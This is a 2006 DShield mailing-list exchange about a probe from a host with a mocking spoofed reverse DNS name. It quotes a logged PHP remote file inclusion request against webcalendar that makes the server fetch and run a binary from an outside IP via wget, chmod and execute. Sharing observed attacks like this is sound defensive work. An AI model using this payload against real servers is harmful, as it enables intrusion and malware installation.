[Dshield] Reverse name

TheGesus thegesus at gmail.com
Mon Mar 20 16:13:20 GMT 2006


On 3/18/06, DigitalNation <dshield at digitalnation.ca> wrote:
> Check out the RV DNS name of this IP (64.62.190.68) that is probing for a
> PHP cross scripting hack:
>
> 64-62-190-68.cave-18.dialup.torabora.bin-Iaden.com
>
> Here is some of the script so you won't think I am BS'ing you:
>
> ---------------------------------------------------
> HTTP_PHP_Includedir, 64.62.190.68,
> 64-62-190-68.cave-18.dialup.torabora.bin-Iaden.com, 64.x.x.x, ,
> URL=/webcalendar/send_reminders.php&arg=includedir%3Dhttp://83.16.187.6/cmd.
> dat?%26cmd%3Dcd%2520/tmp;wget%252083.16.187.6/haita;chmod%2520744%2520haita;
> ./haita;echo%.....
> ----------------------------------------------------
>
> Ha!! Nice...."torabora.bin-Iaden.com"

>
>

That's not an el, that's a capital "i" (in "bin-iaden.com").

Interesting DNS spoof.  No record of bin-iaden.com, although
bin-laden.com exists.



More information about the list mailing list